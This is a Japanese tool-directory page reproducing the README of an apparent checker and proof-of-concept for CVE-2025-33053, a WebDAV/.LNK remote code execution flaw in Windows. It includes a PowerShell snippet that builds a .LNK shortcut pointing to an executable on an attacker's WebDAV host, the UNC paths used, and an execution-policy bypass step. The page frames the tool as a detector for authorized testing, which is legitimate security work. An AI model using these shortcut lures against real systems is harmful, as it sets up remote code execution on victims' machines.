Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-33053-Checker-PoC — CVE-2025-33053 チェッカーとPoC | Kitploit
ツール/GitHubGitHub/thetorjancaptain/cve-2025-33053-checker-poc
脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育
GitHubthetorjancaptain/cve-2025-33053-checker-poc

CVE-2025-33053-Checker-PoC

CVE-2025-33053 チェッカーとPoC

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
11年前未レビュー

CVE-2025-33053 脆弱性チェッカー&概念実証 (PoC)

チェッカーの証明 チェッカーの証明

PoCの証明 PoCの証明

Windows システムに影響を与える、WebDAV ベースの重要なリモートコード実行 (RCE) 脆弱性 CVE-2025-33053 の悪用可能性をチェックし、実証するためのツール一式です。


📌 CVE-2025-33053 について

CVE-2025-33053 は、攻撃者が悪意のあるリモート WebDAV 共有を参照する .LNK ショートカットファイルを悪用し、影響を受けるシステム上でリモートコード実行 (RCE) を引き起こす可能性を許容します。

脆弱性の条件:

  • 対象に WebClient サービス がインストールされ、実行中であること。
  • 対象 OS が .LNK ファイルを介してアクセスされた場合でも、UNC パスを WebDAV 経由で解決 する必要があること。

🔍 脆弱性はどのように機能するか?

  1. 細工された .LNK ファイル、または直接の UNC パスアクセス — 次のようなリモート UNC パスを指します:
  2. .LNK にアクセスするか、UNC パスを手動で参照すると(例:エクスプローラー経由):
    • WebClient サービス が WebDAV 経由でリモート UNC ロケーションとの通信を開始します。
    • システムは攻撃者のサーバーに PROPFIND リクエストを送信し、メタデータを照会します。
  3. この PROPFIND リクエストを受信すると、攻撃者は以下を確認できます:
    • 対象システムが UNC パスを WebDAV 経由で解決すること。
    • そのシステムが CVE-2025-33053 に対して脆弱である可能性があること。

✅ リアルタイム脆弱性チェッカー (CVE-2025-33053_checker.ps1)

機能:

チェック項目目的
🔍 WebClient サービスの状態WebDAV サポートがアクティブで実行中かを確認します。
🔍 Test-Path による UNC パス処理システムがリモート WebDAV UNC パスを解決するかどうかをテストします(CVE 悪用の主要な前提条件)。

実行方法:

  1. PowerShell を管理者として開きます。

  2. スクリプトの実行が制限されている場合は、次を実行します:

root@kitploit:~
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
  1. チェッカーを実行します: .\CVE-2025-33053_checker.ps1

⚙️ 概念実証 (PoC) サーバー (CVE-2025-33053_PoC.py)

機能:

  • 攻撃者のマシン上に Python ベースの WebDAV 風サーバーをセットアップします。
  • 被害者システムが悪意のある UNC パスを解決した際に、受信した PROPFIND リクエストをキャプチャします。
  • システムが接続を試みたことを端末に表示し、悪用の可能性を証明します。
  • 注:VM でテスト済み。

使用方法:

  1. 攻撃者(Kali)のマシンで:
root@kitploit:~
python3 CVE-2025-33053_PoC.py --port 8000
  1. 対象マシンで:
  • エクスプローラーで直接 UNC パスを開きます:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • Windows で手動で .LNK ファイルを作成するか、次の場所に移動します:
root@kitploit:~
\\<Kali-IP>@8000\DavWWWRoot\route.exe
  • ショートカットファイルを作成する PowerShell の例:
root@kitploit:~
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
  1. 対象が脆弱な場合、PoC サーバーは次のようにログ出力します:
root@kitploit:~
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!

🔍 この PoC が正当かつ信頼できる理由:

✔️ 実際の UNC パス解決を使用 — シミュレーションではありません。 ✔️ OS によってトリガーされた実際の PROPFIND リクエストをキャプチャ — CVE 悪用に必要な正確な動作です。 ✔️ ペイロードを実行したり害を及ぼしたりすることなく、実際のネットワークレベルの脆弱性の証拠を示します。


🚧 重要な注意事項

この PoC は対象システムを悪用したり害したりするものではなく、基盤となる脆弱な動作を検出するだけです。 管理された環境または明示的な許可を得た上で使用することを意図しています。 実際のシステム動作を示すものであり、モックシミュレーションではありません。 教育目的のみに使用してください。許可されていないシステムでは実行しないでください。


🏷️ ライセンス

MIT ライセンス — 教育、研究、防御目的のみ無料で使用できます。


🤝 コントリビューション

プルリクエスト歓迎 — 検出の改善、機能追加、修正提案など。


⚠️ 免責事項

このリポジトリは 教育および許可されたセキュリティ研究のみを目的としています。 所有していない、またはテストする許可がないシステムでの悪用は固く禁じられています。

ツールをダウンロード